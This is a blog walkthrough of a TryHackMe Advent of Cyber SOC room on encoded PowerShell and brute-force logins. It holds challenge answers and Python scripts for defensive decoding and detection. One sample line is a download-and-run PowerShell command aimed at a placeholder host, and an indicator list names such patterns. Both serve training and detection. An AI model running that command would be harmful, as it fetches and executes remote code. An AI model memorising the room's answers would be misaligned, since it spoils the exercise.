THM AOC2024 Day 2: SOC SOS – Separating Fact from Fiction
Every December, TryHackMe's Advent of Cyber delivers 24 free daily cybersecurity challenges, offering hands-on scenarios that simulate real-world attacks and defenses. Designed for beginners and professionals alike, it's an exciting, gamified way to explore topics like threat hunting, penetration testing, cryptography, and more. This event is perfect for building skills, gaining practical experience, and spreading some cybersecurity cheer during the festive season!
Learning Objectives
- Learn to differentiate between True Positives (TP) and False Positives (FP) in a Security Operations Center (SOC).
- Understand how to use context and correlation to analyze suspicious activity.
- Learn the basics of investigating encoded PowerShell commands.
Tools Used
- Elastic SIEM: To analyze and correlate log data from alerts.
- CyberChef: To decode encoded PowerShell commands and examine their contents.
Tool Spotlight: Elastic SIEM and CyberChef
Elastic SIEM acts as the analyst's central console for monitoring, correlating, and investigating security events. It provides dashboards, filtering options, and query capabilities to dig deeper into suspicious activity. It's especially powerful in scenarios involving brute-force attempts or encoded command execution, as it allows precise timeline filtering and detailed event inspection.
CyberChef, on the other hand, is the "cyber Swiss army knife." It's invaluable for tasks like decoding Base64 strings (commonly used in PowerShell scripts), extracting hidden data, and analyzing encoded malware payloads. For today's mission, CyberChef played a critical role in uncovering the purpose of PowerShell commands executed on compromised systems.
Room Tasks and Investigation
Step 1: Logging into Elastic SIEM
We began by accessing the Elastic SIEM console with credentials provided in the connection card. This allowed us to investigate the alerts triggered by Mayor Malware's report of encoded PowerShell commands executed across multiple machines.
Step 2: Narrowing the Time Window
The suspicious activity occurred on December 1st, 2024, between 0900 and 0930. By setting this time window in the SIEM, we identified 21 relevant events. To make the logs more readable, the fields host.hostname, user.name, and process.command_line were added as table columns.
Step 3: Observing the Pattern
A clear sequence emerged:
- Authentication events showed a successful login by service_admin, followed closely by PowerShell command executions on multiple machines.
- Investigation revealed that the service_admin account was being accessed from two IP addresses: the legitimate one used for patching updates and another, suspicious IP (10.0.255.1).
Step 4: Decoding the PowerShell Command
Using CyberChef, we decoded the suspicious encoded PowerShell command:
Install-WindowsUpdate -AcceptAll -AutoReboot
This revealed that the command was actually fixing an issue caused by outdated credentials, not installing malware as initially suspected.
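The decoding step above was done by hand in CyberChef. The script below is an added example (not part of the original write-up or of TryHackMe's material) that automates the same work in Python: it pulls the Base64 argument out of a captured PowerShell command line, decodes it the way PowerShell's -EncodedCommand expects (Base64 over UTF-16LE text, with a fallback for plain UTF-8 blobs produced by other tooling), and then runs a small keyword triage so an analyst can see at a glance whether the decoded text looks like routine administration or something that needs escalation. The sample command lines are constructed here; the indicator list is an assumed, analyst-curated starting point rather than a complete rule set.

```python
import base64
import re

# Constructed sample: the command decoded on the page, wrapped the way
# PowerShell's -EncodedCommand expects it (Base64 over UTF-16LE text).
SAMPLE_COMMAND = "Install-WindowsUpdate -AcceptAll -AutoReboot"
SAMPLE_COMMAND_LINE = (
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand "
    + base64.b64encode(SAMPLE_COMMAND.encode("utf-16-le")).decode("ascii")
)

# Constructed contrast case for the triage step: a download-and-run pattern
# that a SOC would escalate (placeholder host, not a real URL).
SUSPICIOUS_COMMAND = (
    "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/p')"
)
SUSPICIOUS_COMMAND_LINE = (
    "powershell.exe -w hidden -enc "
    + base64.b64encode(SUSPICIOUS_COMMAND.encode("utf-16-le")).decode("ascii")
)

# PowerShell accepts abbreviations of -EncodedCommand; -e, -ec, -en and -enc
# are the common ones. "-ExecutionPolicy" is not matched because whitespace
# must follow the flag directly.
_ENC_FLAG = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)"
)

# Assumed analyst-curated indicators; a hit means "investigate", not "malicious".
INDICATORS = {
    "invoke-expression": r"(?i)\bIEX\b|Invoke-Expression",
    "download": r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient",
    "nested-base64": r"(?i)FromBase64String",
}


def extract_encoded_argument(command_line: str):
    """Return the Base64 blob passed to -EncodedCommand, or None."""
    match = _ENC_FLAG.search(command_line)
    return match.group(1) if match else None


def decode_encoded_command(blob: str) -> str:
    """Decode a -EncodedCommand argument back to the script text."""
    raw = base64.b64decode(blob, validate=True)
    # For ASCII commands encoded as UTF-16LE every second byte is NUL; use
    # that to distinguish a genuine PowerShell blob from a UTF-8 one.
    high_bytes = raw[1::2]
    if len(raw) % 2 == 0 and high_bytes and high_bytes.count(0) >= 0.8 * len(high_bytes):
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")


def triage(command_line: str) -> dict:
    """Decode the command line (if encoded) and list the indicators it matches."""
    blob = extract_encoded_argument(command_line)
    if blob is None:
        return {"encoded": False, "decoded": None, "indicators": []}
    decoded = decode_encoded_command(blob)
    hits = sorted(name for name, pattern in INDICATORS.items() if re.search(pattern, decoded))
    return {"encoded": True, "decoded": decoded, "indicators": hits}


if __name__ == "__main__":
    for line in (SAMPLE_COMMAND_LINE, SUSPICIOUS_COMMAND_LINE):
        result = triage(line)
        print(f"decoded : {result['decoded']}")
        print(f"flags   : {result['indicators'] or 'none'}\n")
```

The UTF-16LE check matters in practice: pasting a -EncodedCommand blob into a plain Base64 decoder yields text with a NUL between every character, which is why CyberChef's "Decode text" step with UTF-16LE is needed after "From Base64". The indicator hits only order the queue; as the room shows, the decoded text itself (here a Windows Update cmdlet) is what decides true versus false positive.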
Answering the Questions
- What is the name of the account causing all the failed login attempts?
  - Answer: service_admin
- How many failed logon attempts were observed?
  - Answer: 6791
- What is the IP address of Glitch?
  - Answer: 10.0.255.1
- When did Glitch successfully log on to ADM-01?
  - Answer: Dec 1, 2024 08:54:39.000
- What is the decoded command executed by Glitch to fix the systems of Wareville?
  - Answer: Install-WindowsUpdate -AcceptAll -AutoReboot
Learning Objectives Recap
True vs. False Positives in a SOC
Today's task emphasized the importance of distinguishing TPs from FPs. Misclassifying a TP as an FP can allow malicious activity to go unnoticed, while labeling an FP as a TP can waste valuable time. The structured approach of correlating past events, observing context, and validating hypotheses ensures analysts make informed decisions.
In real-world SOC operations, relying on dashboards, contextual evidence, and patterns (like brute-force login attempts) is essential. For example, organizations can develop detection rules based on the timeline patterns observed here, such as the sudden spike in login failures preceding a successful login and execution of PowerShell commands.
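The paragraph above suggests turning the observed timeline into a detection rule. The following is an added example (not code from the original post or from TryHackMe) of that correlation written as a Python function over a constructed event timeline: a burst of failed logons for one account from one source address, a successful logon for the same account from that address, and PowerShell executions by that account shortly after. The 10.0.255.1 address and the 08:54:39 logon time are taken from the room; the failure count, the 10.0.0.10 "usual" address and the host names are assumptions made up for the sample.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class Event:
    ts: datetime
    kind: str               # "logon_failed", "logon_success" or "process"
    host: str
    user: str
    src_ip: str = ""        # set on logon events
    command_line: str = ""  # set on process events


def build_sample_events():
    """Constructed timeline loosely modelled on the day's scenario."""
    start = datetime(2024, 12, 1, 8, 40, 0)
    logon_time = datetime(2024, 12, 1, 8, 54, 39)
    events = []
    # Burst of failed logons for service_admin from the suspicious address.
    for i in range(30):
        events.append(Event(start + timedelta(seconds=28 * i), "logon_failed",
                            "ADM-01", "service_admin", src_ip="10.0.255.1"))
    # Routine patching session from the usual (assumed) address: no failures precede it.
    events.append(Event(start + timedelta(minutes=5), "logon_success",
                        "ADM-01", "service_admin", src_ip="10.0.0.10"))
    events.append(Event(start + timedelta(minutes=5, seconds=30), "process",
                        "ADM-01", "service_admin",
                        command_line="powershell.exe Get-WindowsUpdate"))
    # The burst ends in a successful logon, then PowerShell runs on several hosts.
    events.append(Event(logon_time, "logon_success",
                        "ADM-01", "service_admin", src_ip="10.0.255.1"))
    for n, host in enumerate(("ADM-01", "WKSTN-01", "WKSTN-02"), start=1):
        events.append(Event(logon_time + timedelta(minutes=n), "process",
                            host, "service_admin",
                            command_line="powershell.exe -EncodedCommand <blob omitted>"))
    return events


def detect_bruteforce_then_exec(events, fail_threshold=20,
                                lookback=timedelta(minutes=15),
                                lookahead=timedelta(minutes=10)):
    """Flag successful logons preceded by a failure burst (same account and
    source address) and followed by PowerShell activity by that account."""
    events = sorted(events, key=lambda e: e.ts)
    findings = []
    for success in events:
        if success.kind != "logon_success":
            continue
        failures = [e for e in events
                    if e.kind == "logon_failed"
                    and e.user == success.user and e.src_ip == success.src_ip
                    and success.ts - lookback <= e.ts < success.ts]
        if len(failures) < fail_threshold:
            continue
        execs = [e for e in events
                 if e.kind == "process" and e.user == success.user
                 and success.ts <= e.ts <= success.ts + lookahead
                 and "powershell" in e.command_line.lower()]
        findings.append({
            "user": success.user,
            "src_ip": success.src_ip,
            "host": success.host,
            "logon_at": success.ts,
            "failed_attempts": len(failures),
            "powershell_hosts": sorted({e.host for e in execs}),
        })
    return findings


if __name__ == "__main__":
    for finding in detect_bruteforce_then_exec(build_sample_events()):
        print(finding)
```

The rule keys on the source address as well as the account, which is what separates the patching session from 10.0.0.10 (no failures, not flagged) from the session from 10.0.255.1. A hit from this rule is exactly the kind of alert the room starts from: it is evidence to investigate, and the decoded command, not the pattern alone, determines whether it ends up a true or a false positive.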
The Power of Context and Correlation
Correlation helped us tie together Glitch's successful login, the execution of PowerShell commands, and the cleanup of expired credentials. In practice, this skill enables analysts to create a story around events—essentially becoming digital detectives.
Investigating Encoded Commands
PowerShell is often used in cyberattacks to download malware, exfiltrate data, or perform lateral movement. CyberChef allowed us to decode the encoded command and verify its legitimacy, a common SOC practice for responding to encoded payloads in the wild. Organizations should ensure encoded commands are thoroughly investigated so that malicious activity is not overlooked.